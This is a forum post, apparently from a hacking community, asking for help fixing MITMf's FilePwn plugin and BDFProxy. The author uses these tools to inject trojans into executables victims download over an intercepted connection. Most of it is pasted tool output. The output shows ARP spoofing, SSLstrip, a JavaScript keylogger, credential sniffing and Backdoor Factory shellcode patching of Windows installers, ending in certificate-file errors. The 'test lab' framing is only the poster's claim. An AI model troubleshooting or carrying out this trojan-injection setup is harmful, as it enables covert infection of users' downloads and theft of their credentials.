Hello, dear members. For now I am working in my own test lab to learn this, and I want to improve myself in these areas. At the moment I am experimenting with ready-made tools to understand the logic behind it. Why does this tool, which I use to inject a trojan into the files the other side downloads, give this error, and how can I fix it?
When I do the same thing with the BDF Proxy tool, I get a similar error there too.
Code:
[*] MITMf v0.9.8 - 'The Dark Side'
|_ FilePwn v0.3
| |_ BDFProxy v0.3.2 online
| |_ Connected to Metasploit v4.16.61-dev
|_ JSKeylogger v0.2
|_ Spoof v0.6
| |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
* Serving Flask app "core.mitmfapi" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
|_ HTTP server online
* Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online
Code:
2018-06-18 23:34:24 10.0.2.5 [type:Other-Other os:Other] [FilePwn] Patching failed
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding CreateThread Thunk in new IAT
[!] Adding LoadLibraryA Thunk in new IAT
[!] Adding VirtualAlloc Thunk in new IAT
[!] Adding GetProcAddress Thunk in new IAT
[*] Gathering file info
[*] Checking updated IAT for thunks
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 45
[*] All caves lengths: 82, 457, 45
[*] Attempting PE File Automatic Patching
[!] Selected: 219: Section Name: .rdata1; Cave begin: 0xa501db End: 0xa503a8; Cave Size: 461; Payload Size: 457
[!] Selected: 216: Section Name: .rdata1; Cave begin: 0xa4fc68 End: 0xa4fe35; Cave Size: 461; Payload Size: 82
[!] Selected: 188: Section Name: .rdata1; Cave begin: 0xa4ff74 End: 0xa4ffca; Cave Size: 86; Payload Size: 45
[*] Changing flags for section: .rdata1
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
Failed to read certificate file: /usr/share/backdoor-factory/certs/Verisign.cer
140707243787456:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/VerisignPrivateKey.pem','rb')
140707243787456:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
140707243787456:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/Verisign.cer','rb')
140707243787456:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
Failed
2018-06-18 23:34:33 10.0.2.5 [type:Edge-13 os:Windows] [FilePwn] Patching complete, forwarding to user
2018-06-18 23:34:33 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
a = f(**args)
File "/usr/share/mitmf/plugins/filepwn.py", line 657, in response
with open(bd_file, 'r+b') as file2:
IOError: [Errno 2] No such file or directory: 'backdoored/tmprDZIZz'
Code:
[!] Writing resource script.
[!] Resource writen to bdfproxy_msf_resource.rc
[!] Configuring traffic forwarding
[*] Starting BDFProxy
[*] Version: v0.3.9
[*] Author: @midnite_runr | the[.]midnite).(runr<at>gmail|.|com
Code:
[*] HOST: 23.xxx.xxx.12
[*] PATH: /8576cda7b0579adb1a5ef0071050218a2de14006/graphics/iview451_x64_setup.exe
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win64 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding CreateThread Thunk in new IAT
[!] Adding LoadLibraryA Thunk in new IAT
[!] Adding VirtualAlloc Thunk in new IAT
[*] Gathering file info
[*] Checking updated IAT for thunks
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Checking execution Level
[*] File already set to highestAvailable execution level
[!] Could not patch higher run level in manifest, requestedExecutionLevel did not exist
[*] Creating win64 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 55
[*] All caves lengths: 167, 501, 55
[*] Attempting PE File Automatic Patching
[!] Selected: 193: Section Name: .rdata1; Cave begin: 0x35d311 End: 0x35d50a; Cave Size: 505; Payload Size: 501
[!] Selected: 188: Section Name: .data; Cave begin: 0x6763e End: 0x67837; Cave Size: 505; Payload Size: 167
[!] Selected: 133: Section Name: .rdata1; Cave begin: 0x35d72c End: 0x35d767; Cave Size: 59; Payload Size: 55
[*] Changing flags for section: .data
[*] Changing flags for section: .rdata1
[*] Patching initial entry instructions
[*] Creating win64 resume execution stub
[*] Looking for and setting selected shellcode
Failed to read certificate file: /usr/share/backdoor-factory/certs/Verisign.cer
139714431345856:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/VerisignPrivateKey.pem','rb')
139714431345856:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
139714431345856:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/Verisign.cer','rb')
139714431345856:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182: